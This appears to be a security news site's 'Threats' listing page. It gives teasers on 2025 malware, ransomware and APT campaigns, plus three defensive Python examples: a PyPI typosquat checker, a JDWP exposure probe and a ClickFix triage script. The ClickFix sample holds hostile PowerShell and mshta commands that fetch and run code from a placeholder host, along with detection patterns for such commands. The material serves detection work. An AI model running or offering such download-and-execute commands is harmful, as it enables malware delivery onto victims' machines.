Category: Threats
-
Scattered Spider's New Telegram Channel Lists the Organizations It Attacked
In early August 2025, a previously quiet cybercrime collective known as Scattered Spider resurfaced with a striking new Telegram channel that aggregates proof of its intrusions and data exfiltration operations. The channel name fuses ShinyHunters, Scattered Spider, and Lapsus$, signaling a collaboration, or at least a…
-
Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets
A sophisticated cryptocurrency theft campaign has emerged targeting the Bittensor ecosystem through malicious Python packages distributed via the Python Package Index (PyPI). The attack leverages typosquatting techniques to deceive developers and users into installing compromised versions of legitimate Bittensor packages, ultimately resulting in…
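A pre-install check for the typosquatting pattern described above, as an added example that is not code from the article or from the Bittensor project. It normalizes names the way PyPI does (PEP 503), then flags anything within a couple of edits of a legitimate name or that embeds a legitimate name as a token. The allowlist and the requirements file are constructed for this example; a real deployment would load the allowlist from a maintained internal list.

```python
"""
Added example: flag package names that impersonate a known-good package.
The LEGITIMATE allowlist and SAMPLE_REQUIREMENTS are constructed for the
example, not taken from the article or from a real lockfile.
"""
import re

# Assumed allowlist of names the campaign would want to impersonate.
LEGITIMATE = {"bittensor", "bittensor-cli"}


def normalize(name: str) -> str:
    """PEP 503 normalization: case-fold and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance with a two-row DP table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, allowlist=LEGITIMATE, max_distance: int = 2):
    """
    Return the legitimate names `name` could be impersonating.
    An exact normalized match returns [] (it is the real package). Otherwise a
    name within `max_distance` edits of a legitimate name, or one that carries a
    legitimate name as a dash-separated token ('bittensor-wallet-tools'), is reported.
    """
    n = normalize(name)
    norm_allow = {normalize(x) for x in allowlist}
    if n in norm_allow:
        return []
    tokens = n.split("-")
    hits = []
    for legit in sorted(norm_allow):
        if levenshtein(n, legit) <= max_distance or legit in tokens:
            hits.append(legit)
    return hits


def audit_requirements(requirements_text: str, allowlist=LEGITIMATE):
    """Parse a requirements.txt body and map each suspicious name to its look-alikes."""
    findings = {}
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("-"):       # skip blanks and pip options
            continue
        pkg = re.split(r"[=<>!~\[ ;]", line, 1)[0]  # strip specifiers/extras/markers
        hits = typosquat_candidates(pkg, allowlist)
        if hits:
            findings[pkg] = hits
    return findings


# Constructed sample, not a real lockfile.
SAMPLE_REQUIREMENTS = """\
bittensor==9.0.0
bittenser>=1.0        # one substitution away from the real name
bittensor-cli
bittensor_wallet_tools
requests
"""

if __name__ == "__main__":
    for pkg, hits in audit_requirements(SAMPLE_REQUIREMENTS).items():
        print(f"{pkg}: looks like {', '.join(hits)}")
```

Run it before `pip install -r` in CI; a non-empty result is a reason to stop and compare the package's PyPI page, maintainer and upload date against the legitimate project before proceeding.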
-
Huge Wave of Malicious Efimer Script Attacks Users via WordPress Sites, Malicious Torrents, and Email
A sophisticated malware campaign dubbed “Efimer” has emerged as a significant threat to cryptocurrency users worldwide, employing a multi-vector approach that combines compromised WordPress websites, malicious torrents, and deceptive email campaigns. First detected in October 2024, this ClipBanker-type Trojan…
-
5,000+ Fake Online Pharmacy Websites Selling Counterfeit Medicines
A sophisticated cybercriminal enterprise operating over 5,000 fraudulent online pharmacy websites has been exposed in a comprehensive investigation, revealing one of the largest pharmaceutical fraud networks ever documented. This massive operation, orchestrated by a single threat actor group, targets vulnerable individuals seeking prescription medications through deceptive digital…
-
DarkCloud Stealer Employs New Infection Chain and ConfuserEx-Based Obfuscation
A sophisticated information-stealing malware campaign has emerged, utilizing advanced obfuscation techniques and multiple infection vectors to evade traditional security controls. The DarkCloud Stealer, first documented in recent threat intelligence reports, represents a significant evolution in cybercriminal tactics, employing a complex multi-stage delivery mechanism that begins with…
-
Biggest Ever GreedyBear Attack Uses 650 Hacking Tools to Steal $1 Million from Victims
A sophisticated cybercriminal operation known as GreedyBear has orchestrated one of the most extensive cryptocurrency theft campaigns to date, deploying over 650 malicious tools across multiple attack vectors to steal more than $1 million from unsuspecting victims. Unlike traditional threat groups that…
-
HashiCorp Vault 0-Day Vulnerabilities Let Attackers Execute Remote Code
Security researchers uncovered a series of critical zero-day vulnerabilities in HashiCorp Vault, the widely adopted secrets management solution, in early August 2025. These flaws, spanning authentication bypasses, policy enforcement inconsistencies, and audit-log abuse, create end-to-end attack paths that culminate in remote code execution (RCE) on Vault…
-
Threat Actors Weaponizing RMM Tools to Take Control of Machines and Steal Data
Cybercriminals are increasingly exploiting Remote Monitoring and Management (RMM) software to gain unauthorized access to corporate systems, with a sophisticated new attack campaign demonstrating how legitimate IT tools can become powerful weapons in the wrong hands. This emerging threat leverages the…
-
Bing Search Poisoned to Deliver Bumblebee Malware for ‘ManageEngine OpManager’ Searches
A sophisticated search engine optimization (SEO) poisoning campaign exploited Bing search results to distribute Bumblebee malware, ultimately leading to devastating Akira ransomware attacks. The campaign, active throughout July 2025, specifically targeted users searching for legitimate IT management software, demonstrating how threat actors continue…
-
New Android Malware Mimics SBI Card and Axis Bank Apps to Steal Users' Financial Data
A sophisticated new Android malware campaign has emerged targeting Indian banking customers through convincing impersonations of popular financial applications. The malicious software masquerades as legitimate apps from major Indian financial institutions, including SBI Card, Axis Bank, IndusInd Bank, ICICI, and…
-
Microsoft PlayReady DRM Used by Netflix, Amazon, and Disney+ Leaked Online
A significant security breach has compromised Microsoft’s PlayReady Digital Rights Management (DRM) system, exposing critical certificates that protect premium streaming content across major platforms including Netflix, Amazon Prime Video, and Disney+. The leak, which surfaced on GitHub through an account named “Widevineleak,” has triggered…
-
Interlock Ransomware Employs ClickFix Technique to Run Malicious Commands on Windows Machines
The cybersecurity landscape continues to evolve as threat actors develop increasingly sophisticated methods to compromise Windows systems. A new ransomware variant known as Interlock has emerged as a significant threat, leveraging the deceptive ClickFix social engineering technique to execute malicious commands on victim…
-
APT37 Hackers Weaponize JPEG Files to Attack Windows Systems Leveraging “mspaint.exe”
A sophisticated new wave of cyberattacks attributed to North Korea’s notorious APT37 (Reaper) group is leveraging advanced malware hidden within JPEG image files to compromise Microsoft Windows systems, signaling a dangerous evolution in evasion tactics and fileless attack techniques. Security researchers at Genians Security…
-
Lazarus Hackers Weaponized 234 Packages Across npm and PyPI to Infect Developers
A sophisticated cyber espionage campaign targeting software developers has infiltrated two of the world’s largest open source package repositories, with North Korea’s notorious Lazarus Group successfully deploying 234 malicious packages across npm and PyPI ecosystems. Between January and July 2025, this state-sponsored operation…
-
SafePay Ransomware Infected 260+ Victims Across Multiple Countries
A new ransomware threat has emerged as one of the most aggressive cybercriminal operations of 2025, with SafePay ransomware claiming responsibility for over 265 successful attacks spanning multiple continents. The group, which first appeared in September 2024 with limited activity targeting just over 20 victims, has dramatically…
-
Qilin Ransomware Surges Following the Fall of the Dominant RansomHub RaaS
The ransomware landscape experienced a significant shift in the second quarter of 2025 as Qilin ransomware emerged as the dominant threat following the unexpected collapse of RansomHub, previously the most prolific ransomware-as-a-service operation. This transition has reshaped the cybercriminal ecosystem, with Qilin capitalizing on the…
-
LockBit Operators Using Stealthy DLL Sideloading Technique to Load Malicious App as Legitimate One
LockBit ransomware operators have adopted an increasingly sophisticated approach to evade detection by leveraging DLL sideloading techniques that exploit the inherent trust placed in legitimate applications. This stealthy method involves tricking legitimate, digitally signed applications into loading malicious Dynamic Link Libraries…
-
Unit 42 Unveils Attribution Framework to Classify Threat Actors Based on Activity
Palo Alto Networks’ Unit 42 threat research team has introduced a groundbreaking systematic approach to threat actor attribution, addressing longstanding challenges in cybersecurity intelligence analysis. The Unit 42 Attribution Framework, unveiled on July 31, 2025, transforms what has traditionally been considered “more art…
-
Threat Actors Embed Malicious RMM Tools to Gain Silent Initial Access to Organizations
A sophisticated cyber campaign leveraging legitimate Remote Monitoring and Management (RMM) tools has emerged as a significant threat to European organizations, particularly those in France and Luxembourg. Since November 2024, threat actors have been deploying carefully crafted PDF documents containing embedded links…
-
Navigating APTs – Singapore’s Cautious Response to State-Linked Cyber Attacks
Singapore’s cybersecurity landscape faced a significant challenge in July 2025 when Coordinating Minister K. Shanmugam disclosed that the nation was actively defending against UNC3886, a highly sophisticated Advanced Persistent Threat (APT) group targeting critical infrastructure. The revelation, announced during the Cyber Security Agency’s 10th anniversary…
-
APT Hackers Attacking Maritime and Shipping Industry to Launch Ransomware Attacks
The maritime industry, which facilitates approximately 90% of global trade, has emerged as a critical battleground for advanced persistent threat (APT) groups deploying sophisticated ransomware campaigns. This surge in cyber warfare represents a paradigm shift where state-sponsored hackers and financially motivated threat actors are…
-
Gunra Ransomware New Linux Variant Runs Up To 100 Encryption Threads With New Partial Encryption Feature
A sophisticated new Linux variant of Gunra ransomware has emerged, marking a significant escalation in the threat group’s cross-platform capabilities since its initial discovery in April 2025. The ransomware, which drew inspiration from the notorious Conti ransomware techniques, has…
-
Qilin Ransomware Leverages TPwSav.sys Driver to Disable EDR Security Measures
Cybercriminals have once again demonstrated their evolving sophistication by weaponizing an obscure Toshiba laptop driver to bypass endpoint detection and response systems. The Qilin ransomware operation, active since July 2022, has incorporated a previously unknown vulnerable driver called TPwSav.sys into their attack arsenal, enabling them…
-
Lionishackers Threat Actors Exfiltrating and Selling Corporate Databases on Dark Web
A financially motivated threat actor known as Lionishackers has emerged as a significant player in the illicit marketplace for corporate data in recent months. Leveraging opportunistic targeting and a preference for Asian-based victims, the group employs automated SQL injection tools to breach database servers,…
-
Malicious Android Apps Mimicking Popular Indian Banking Apps Steal Login Credentials
Attackers are weaponizing India’s appetite for mobile banking by circulating counterfeit Android apps that mimic the interfaces and icons of public-sector and private banks. Surfacing in telemetry logs on 3 April 2025, the impostors travel through smishing texts, QR codes and search-engine poisoning,…
-
New Malware Attack Leverages YouTube Channels and Discord to Harvest Credentials from Computers
A newly uncovered campaign is exploiting gamers’ enthusiasm for off-beat indie titles to plant credential-stealing malware on machines. Branded installers for nonexistent games such as “Baruda Quest,” “Warstorm Fire,” and “Dire Talon” are pushed through slick YouTube trailers and Discord download links…
-
GLOBAL GROUP’s Golang Ransomware Attacks Windows, Linux, and macOS Environments
A sophisticated new ransomware threat has emerged from the cybercriminal underground, targeting organizations across multiple operating systems with advanced cross-platform capabilities. In June 2025, a ransomware actor operating under the alias “Dollar Dollar Dollar” introduced GLOBAL GROUP on the Ramp4u cybercrime forum, marketing it as…
-
Greedy Sponge Hackers Attacking Financial Institutions With Modified Version of AllaKore RAT
A financially motivated threat group dubbed Greedy Sponge has been systematically targeting Mexican financial institutions and organizations since 2021 with a heavily modified version of the AllaKore remote access trojan (RAT). The campaign represents a sophisticated evolution of cybercriminal tactics, combining traditional social…
-
New Veeam-Themed Phishing Attack Uses Weaponized WAV File to Attack Users
A sophisticated phishing campaign targeting organizations has emerged, exploiting the trusted reputation of Veeam Software through weaponized WAV audio files delivered via email. The attack represents an evolution in social engineering tactics, combining traditional phishing techniques with audio-based deception to bypass conventional security…
-
Chinese Threat Actors Using 2,800 Malicious Domains to Deliver Windows-Specific Malware
A sophisticated Chinese threat actor campaign has emerged as one of the most persistent malware distribution operations targeting Chinese-speaking communities worldwide. Since June 2023, this ongoing campaign has established an extensive infrastructure comprising more than 2,800 malicious domains specifically designed to deliver Windows-targeted malware…
-
Snake Keylogger Evades Windows Defender and Scheduled Tasks to Harvest Login Credentials
A sophisticated phishing campaign targeting Turkish defense and aerospace enterprises has emerged, delivering a highly evasive variant of the Snake Keylogger malware through fraudulent emails impersonating TUSAŞ (Turkish Aerospace Industries). The malicious campaign distributes files disguised as contractual documents, specifically using the filename…
-
Lumma Infostealer Steals All Data Stored in Browsers and Sells It in Underground Markets as Logs
The cybersecurity landscape continues to face significant threats from sophisticated information stealers, with Lumma emerging as one of the most prevalent and dangerous malware families targeting both consumer and enterprise environments. This malicious software systematically harvests enormous volumes of…
-
New Wave of Crypto-Hijacking Infects 3,500+ Websites
A stealth Monero-mining campaign has quietly compromised more than 3,500 websites by embedding an innocuous-looking JavaScript file called karma.js. The operation leverages WebAssembly, Web Workers, and WebSockets to siphon CPU cycles while keeping resource usage low enough to avoid user suspicion. Cside.dev analysts first noted the anomaly after…
-
Google Sues BadBox 2.0 Botnet Operators Whose Malware Infects 10 Million+ Devices
Google has filed a lawsuit in New York federal court against the operators of the BadBox 2.0 botnet, marking a significant escalation in the tech giant’s fight against cybercriminal networks. The malware campaign represents the largest known botnet of internet-connected television devices, compromising…
-
Fancy Bear Hackers Attacking Governments, Military Entities With New Sophisticated Tools
The notorious Russian cyberespionage group Fancy Bear, also known as APT28, has intensified its operations against governments and military entities worldwide using an arsenal of sophisticated new tools and techniques. Active since 2007, this state-sponsored threat actor has established itself as one of the…
-
Chinese State-Sponsored Hackers Attacking Semiconductor Industry with Weaponized Cobalt Strike
A sophisticated Chinese state-sponsored cyber espionage campaign has emerged targeting Taiwan’s critical semiconductor industry, employing weaponized Cobalt Strike beacons and advanced social engineering tactics. Between March and June 2025, multiple threat actors launched coordinated attacks against semiconductor manufacturing, design, and supply chain organizations, reflecting China’s…
-
Ukraine Hackers Claimed Cyberattack on Major Russian Drone Supplier
Last week, Ukraine’s Main Intelligence Directorate (GUR) orchestrated a sophisticated cyberattack against Gaskar Integration, a leading Russian drone manufacturer. The operation began with reconnaissance of the company’s public-facing infrastructure, where threat actors identified vulnerable remote desktop services and outdated VPN gateways. Leveraging a zero-day in a…
-
H2Miner Attacking Linux, Windows, and Containers to Mine Monero
The H2Miner botnet, first observed in late 2019, has resurfaced with an expanded arsenal that blurs the line between cryptojacking and ransomware. The latest campaign leverages inexpensive virtual private servers (VPS) and a grab-bag of commodity malware to compromise Linux hosts, Windows workstations, and container workloads…
-
Researchers Uncover How Hacktivist Groups Gain Attention and Select Targets
The global hacktivist landscape has undergone a dramatic transformation since 2022, evolving from primarily ideologically motivated actors into a complex ecosystem where attention-seeking behavior and monetization strategies drive operational decisions. This shift has fundamentally altered how these groups select targets and conduct campaigns, creating…
-
Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript
Threat actors are quietly turning Scalable Vector Graphics (SVG) files into precision-guided malware. In a surge of phishing campaigns, seemingly innocuous .svg attachments slip past secure email gateways because mail filters regard them as static images. Once the recipient merely previews the file, hidden JavaScript executes…
-
Infostealers Distributed With Cracked Apps Emerge as Top Attack Vector for June 2025
The cybersecurity landscape in June 2025 was dominated by a surge of Infostealer malware masked as cracked or key-generated software, catapulting this tactic to the month’s most prevalent attack vector. Fraudulent download portals advertising “free” versions of popular tools lured victims through…
-
Microsoft Details on How Security Copilot in Intune and Entra Helps Security and IT Teams
Microsoft has announced significant enhancements to its AI-powered security platform, marking the general availability of Microsoft Security Copilot capabilities within Microsoft Intune and Microsoft Entra. This development represents a critical milestone in the evolution of enterprise security management, as organizations…
-
Dark 101 Ransomware With Weaponized .NET Binary Disables Recovery Mode and Task Manager
A sophisticated new ransomware strain has emerged in the cybersecurity landscape, demonstrating advanced evasion techniques and destructive capabilities that pose significant risks to organizations worldwide. The Dark 101 ransomware represents a concerning evolution in malware design, utilizing an obfuscated .NET binary to…
-
Albemarle County Hit By Ransomware Attack – Hackers Accessed Residents' Personal Details
Albemarle County, Virginia, has fallen victim to a sophisticated ransomware attack that compromised the personal information of county residents, local government employees, and public school staff. The cybercriminal operation successfully infiltrated the county’s network infrastructure, forcing officials to launch an extensive incident response…
-
Qilin Emerged as The Most Active Group, Exploiting Unpatched Fortinet Vulnerabilities
The ransomware landscape witnessed a dramatic shift in June 2025 as the Qilin ransomware group surged to become the most active threat actor, recording 81 victims and representing a staggering 47.3% increase in activity compared to previous months. This Ransomware-as-a-Service operation, which has accumulated…
-
Mis-scoped AWS Organizations Managed Policy Let Hackers Take Full Control of an AWS Organization
A critical security vulnerability in AWS Organizations has been discovered that could allow attackers to achieve complete control over entire multi-account AWS environments through a mis-scoped managed policy. The flaw, identified in the AmazonGuardDutyFullAccess managed policy version 1, enables privilege escalation from…
-
Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data
The cybersecurity landscape is witnessing an alarming surge in macOS-targeted information-stealing malware, marking a significant shift from the traditional Windows-centric threat model. These sophisticated infostealers are rapidly evolving to exploit macOS environments with unprecedented precision, targeting valuable data including browser credentials, cookies, and…
-
Microsoft Eliminated High-Privilege Access to Enhance Microsoft 365 Security
Microsoft has successfully eliminated high-privilege access vulnerabilities across its Microsoft 365 ecosystem as part of its comprehensive Secure Future Initiative, marking a significant milestone in enterprise security architecture. The technology giant’s Deputy Chief Information Security Officer for Experiences and Devices, Naresh Kannan, announced that the company…
-
Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials
Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating. At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to “verify” their session by…
-
Researchers Expose Scattered Spider’s Tools, Techniques and Key Indicators
Scattered Spider’s phishing domain patterns provide actionable insights to proactively counter threats from the notorious cyber group responsible for recent airline attacks. Scattered Spider, a sophisticated cyber threat group known for aggressive social engineering and targeted phishing, is broadening its scope, notably targeting aviation alongside enterprise…
-
Russia Jailed Hacker Who Worked for Ukrainian Intelligence to Launch Cyberattacks on Critical Infrastructure
Russian Federal Security Service (FSB) officers have detained two hackers in Siberia who conducted cyberattacks on critical infrastructure facilities under direct orders from Ukrainian intelligence services. The simultaneous arrests in the Kemerovo and Tomsk regions exposed a sophisticated cyber espionage network…
-
Threat Actors Turning Job Offers Into Traps, Over $264 Million Lost in 2024 Alone
Cybercriminals are exploiting the economic uncertainty and remote work trends to orchestrate sophisticated employment fraud schemes, with victims losing over $264 million in 2024 alone according to FBI reports. These malicious campaigns, known as “task scams,” represent a rapidly evolving threat…
-
Hackers Exploit Legitimate Inno Setup Installer to Use as a Malware Delivery Vehicle
Cybercriminals have increasingly turned to legitimate software installation frameworks as vehicles for malware distribution, with Inno Setup emerging as a preferred tool for threat actors seeking to bypass security measures. This legitimate Windows installer framework, originally designed to simplify software deployment, has…
-
Researchers Uncover New Technique to Exploit Azure Arc for Hybrid Escalation in Enterprise Environment and Maintain Persistence
Cybersecurity researchers have discovered a sophisticated attack technique that exploits Microsoft Azure Arc deployments to gain persistent access to enterprise environments. The research, conducted during recent red team operations, reveals how adversaries can leverage misconfigured Azure Arc installations…
-
Hackers Exploiting Java Debug Wire Protocol Servers in the Wild to Deploy Cryptomining Payload
A new wave of cyberattacks is targeting organizations that inadvertently expose Java Debug Wire Protocol (JDWP) servers to the internet, with attackers leveraging this overlooked entry point to deploy sophisticated cryptomining malware. JDWP, a standard feature in the Java platform, is designed…
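A JDWP exposure probe for the entry point described above, as an added example that is not code from the article or from any attacker tooling. JDWP has no authentication: the transport opens with a plaintext `JDWP-Handshake` exchange, after which any client may send commands. The probe completes that handshake and then issues `VirtualMachine.Version` (command set 1, command 1) so that a scan result names the JVM rather than just reporting an open port. The loopback "fake JVM" is a constructed stand-in used to exercise the code offline; the version strings it returns are made up.

```python
"""
Added example: JDWP handshake + VirtualMachine.Version probe.
Packet layout (all big-endian): length(4) id(4) flags(1) then either
cmdset(1) cmd(1) for a command or errorcode(2) for a reply (flags=0x80).
Version reply body: string description, int jdwpMajor, int jdwpMinor,
string vmVersion, string vmName; strings are 4-byte length + UTF-8.
"""
import socket
import struct
import threading

HANDSHAKE = b"JDWP-Handshake"
REPLY_FLAG = 0x80


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed before {n} bytes arrived")
        buf += chunk
    return buf


def version_request(packet_id=1):
    """Header-only command packet: VirtualMachine.Version has no payload."""
    return struct.pack(">IIBBB", 11, packet_id, 0, 1, 1)


def _jdwp_string(s):
    data = s.encode("utf-8")
    return struct.pack(">I", len(data)) + data


def build_version_reply(packet_id, description, major, minor, vm_version, vm_name):
    """Encode a VirtualMachine.Version reply the way a JVM would (used by the fake server)."""
    body = (_jdwp_string(description) + struct.pack(">II", major, minor)
            + _jdwp_string(vm_version) + _jdwp_string(vm_name))
    return struct.pack(">IIBH", 11 + len(body), packet_id, REPLY_FLAG, 0) + body


def parse_version_reply(packet):
    """Decode a reply packet; None if it is not a successful Version reply."""
    length, _pid, flags, err = struct.unpack(">IIBH", packet[:11])
    if flags != REPLY_FLAG or err != 0:
        return None
    body, pos = packet[11:length], 0

    def take_string():
        nonlocal pos
        (n,) = struct.unpack(">I", body[pos:pos + 4])
        pos += 4
        s = body[pos:pos + n].decode("utf-8")
        pos += n
        return s

    description = take_string()
    major, minor = struct.unpack(">II", body[pos:pos + 8])
    pos += 8
    return {"description": description, "jdwp": f"{major}.{minor}",
            "vm_version": take_string(), "vm_name": take_string()}


def probe_jdwp(host, port, timeout=3.0):
    """Return JVM details if (host, port) speaks JDWP, else None."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HANDSHAKE)
        if _recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
            return None                      # some other service on the port
        s.sendall(version_request())
        header = _recv_exact(s, 11)
        (length,) = struct.unpack(">I", header[:4])
        return parse_version_reply(header + _recv_exact(s, length - 11))


def _fake_jvm(listener):
    """Constructed stand-in for an exposed JVM: answers one probe, then exits."""
    conn, _ = listener.accept()
    with conn:
        if _recv_exact(conn, len(HANDSHAKE)) == HANDSHAKE:
            conn.sendall(HANDSHAKE)
            _len, pid, _flags, _cs, _cmd = struct.unpack(">IIBBB", _recv_exact(conn, 11))
            conn.sendall(build_version_reply(
                pid, "Java Debug Wire Protocol (Reference Implementation)",
                1, 8, "17.0.2", "OpenJDK 64-Bit Server VM"))   # made-up values


def local_demo():
    """Start the fake JVM on a loopback port and probe it."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=_fake_jvm, args=(listener,), daemon=True).start()
    try:
        return probe_jdwp("127.0.0.1", listener.getsockname()[1])
    finally:
        listener.close()


if __name__ == "__main__":
    print(local_demo())
```

Running the file executes the loopback demo. Against real infrastructure, point `probe_jdwp` at the hosts and ports your asset inventory lists with `-agentlib:jdwp=transport=dt_socket,...,address=*:PORT` (or the older `address=PORT` form that binds all interfaces); any host that completes the handshake is reachable for arbitrary code execution and should be firewalled or restarted with the debug agent bound to localhost only.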
-
Massive Android Ad Fraud ‘IconAds’ Leverages Google Play to Attack Phone Users
A sophisticated mobile ad fraud operation dubbed “IconAds” has infiltrated Android devices worldwide through 352 malicious applications distributed via Google Play Store, generating up to 1.2 billion fraudulent bid requests daily at its peak. The scheme represents a significant evolution in mobile advertising…
-
Hackers use Fake Cloudflare Verification Screen to Trick Users into Executing Malware
A sophisticated social engineering campaign has emerged targeting unsuspecting users through fraudulent Cloudflare verification screens, representing a new evolution in malware distribution tactics. This attack method leverages the trusted appearance of legitimate web security services to deceive victims into executing malicious code on…
-
Chinese Student Charged for Running a Mass Smishing Campaign to Harvest Victims' Personal Details
A sophisticated smishing operation targeting tens of thousands of potential victims across Greater London has resulted in the sentencing of Ruichen Xiong, a Chinese student, to over a year in prison at Inner London Crown Court. The case represents a significant…
-
TA829 Hackers Employ New TTPs and Upgraded RomCom Backdoor to Evade Detections
The cybersecurity landscape faces a renewed threat as TA829, a sophisticated threat actor group, has emerged with enhanced tactics, techniques, and procedures (TTPs) alongside an upgraded version of the notorious RomCom backdoor. This hybrid cybercriminal-espionage group has demonstrated remarkable adaptability, conducting both financially…
-
Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines
The notorious North Korean threat group Kimsuky has adopted a sophisticated social engineering tactic known as “ClickFix” to deceive users into executing malicious scripts on their own systems. Originally introduced by Proofpoint researchers in April 2024, this deceptive technique tricks victims into believing…
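ClickFix appears four times on this page (Interlock, Rhadamanthys, the fake Cloudflare verification screen, and Kimsuky), and in every case the lure ends the same way: the victim pastes a command the page hands them into a Run prompt. The following is an added example, not code from any of those articles, of the host-side triage a responder can do after the fact. It assumes the lure used the Windows Run dialog, whose history Explorer keeps under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` (values `a`, `b`, ... each ending in a literal `\1`, with `MRUList` giving most-recent-first order). The `reg query` output below is constructed, and the domain in it is a placeholder; the indicator list is the author's assumption of what a first-pass rule set covers.

```python
"""
Added example: triage RunMRU history for ClickFix-style one-liners.
SAMPLE_REG_QUERY is constructed text in the shape `reg query` prints;
it is not a real artifact from any of the campaigns on this page.
"""
import re

# Binaries a pasted ClickFix command typically starts with.
LOLBINS = ("powershell", "pwsh", "mshta", "cmd", "wscript", "cscript",
           "certutil", "curl", "msiexec", "rundll32", "bitsadmin")

# (regex over the lower-cased command, label). Assumed first-pass rule set.
INDICATORS = [
    (r"-w(indowstyle)?\s+h", "hidden window"),
    (r"-e(xecutionpolicy|p)\s+bypass", "execution policy bypass"),
    (r"(^|\s)-(e|enc|encodedcommand)\s", "encoded command"),
    (r"\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", "remote fetch"),
    (r"https?://", "URL"),
    (r"\bmshta\b.*https?://", "mshta remote HTA"),
]


def parse_reg_query(text):
    """Return ({value_name: command}, mru_order) from `reg query ...\\RunMRU` output."""
    entries, order = {}, ""
    for line in text.splitlines():
        m = re.match(r"\s+(\S+)\s+REG_SZ\s+(.*)$", line)
        if not m:
            continue                          # key path line or blank
        name, data = m.group(1), m.group(2)
        if name.lower() == "mrulist":
            order = data.strip()
        else:
            entries[name] = data[:-2] if data.endswith("\\1") else data
    return entries, order


def score_command(cmd):
    """List the indicators a single Run-dialog command trips."""
    low = cmd.lower()
    tokens = re.split(r"[\s\"']+", low)
    hits = []
    for b in LOLBINS:
        if any(t in (b, b + ".exe") or t.endswith("\\" + b) or t.endswith("\\" + b + ".exe")
               for t in tokens):
            hits.append(f"lolbin:{b}")
            break
    for pattern, label in INDICATORS:
        if re.search(pattern, low):
            hits.append(label)
    return hits


def triage_runmru(text):
    """
    Return [(value_name, command, hits)] in most-recent-first order for entries
    that start a LOLBIN *and* trip at least one further indicator, so a plain
    'cmd /c echo' is not reported.
    """
    entries, order = parse_reg_query(text)
    names = [n for n in order if n in entries] + sorted(set(entries) - set(order))
    flagged = []
    for n in names:
        hits = score_command(entries[n])
        if any(h.startswith("lolbin:") for h in hits) and len(hits) >= 2:
            flagged.append((n, entries[n], hits))
    return flagged


# Constructed sample in `reg query` format; captcha.example.invalid is a placeholder.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    notepad\1
    b    REG_SZ    powershell -w hidden -ep bypass -c "irm https://captcha.example.invalid/verify | iex"\1
    c    REG_SZ    mshta https://captcha.example.invalid/verify.hta\1
    d    REG_SZ    cmd /c echo Hello\1
    MRUList    REG_SZ    cbda
"""

if __name__ == "__main__":
    for name, cmd, hits in triage_runmru(SAMPLE_REG_QUERY):
        print(f"[{name}] {cmd}\n      {', '.join(hits)}")
```

On a live host the input is `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` run as the affected user; the same scoring applies equally well to PowerShell console history (`ConsoleHost_history.txt`) and to process-creation telemetry where the parent is `explorer.exe`, which is where a detection rule for this technique belongs.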
-
North Korean Remote IT Workers Added New Tactics and Techniques to Infiltrate Organizations
North Korean state-sponsored remote IT workers have significantly evolved their infiltration tactics, incorporating artificial intelligence tools and sophisticated deception techniques to penetrate organizations worldwide. Since 2024, these highly skilled operatives have enhanced their fraudulent employment schemes by leveraging AI-powered image manipulation, voice-changing…
-
CISA Warns Iranian Cyber Actors May Attack U.S. Critical Infrastructure
The Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI, Department of Defense Cyber Crime Center, and National Security Agency, has issued an urgent warning regarding potential cyber attacks by Iranian-affiliated actors targeting U.S. critical infrastructure. Despite ongoing ceasefire negotiations and diplomatic efforts,…
-
Androxgh0st Botnet Operators Exploit US University to Host C2 Logger
The Androxgh0st botnet has significantly expanded its operations since 2023, with cybercriminals now compromising prestigious academic institutions to host their command and control infrastructure. This sophisticated malware campaign has demonstrated remarkable persistence and evolution, targeting a diverse range of vulnerabilities across web applications, frameworks, and…
-
TeamFiltration Pentesting Tool Weaponized to Hijack Microsoft Teams, Outlook, and Other Accounts
A sophisticated cyberattack campaign has weaponized a legitimate penetration testing framework to compromise thousands of Microsoft cloud accounts across hundreds of organizations worldwide. The malicious operation, designated UNK_SneakyStrike, leverages TeamFiltration, a popular cybersecurity tool originally designed for Office 365 security assessments, to conduct…
-
Sophisticated Malware Campaign Targets WordPress and WooCommerce Sites with Obfuscated Skimmers
A sophisticated malware campaign has emerged targeting WordPress and WooCommerce websites with highly obfuscated credit card skimmers and credential theft capabilities, representing a significant escalation in e-commerce cyberthreats. The malware family demonstrates advanced technical sophistication through its modular architecture, featuring multiple variants designed for…
-
North Korean Hackers Trick Users With Weaponized Zoom Apps to Execute System-Takeover Commands
A sophisticated cybercriminal campaign has emerged targeting professionals through meticulously crafted fake Zoom applications designed to execute system takeover commands. The attack leverages advanced social engineering techniques combined with convincing domain spoofing to deceive users into compromising their systems, representing a significant…
-
LapDogs Hackers Leverage 1,000 SOHO Devices Using a Custom Backdoor to Act Covertly
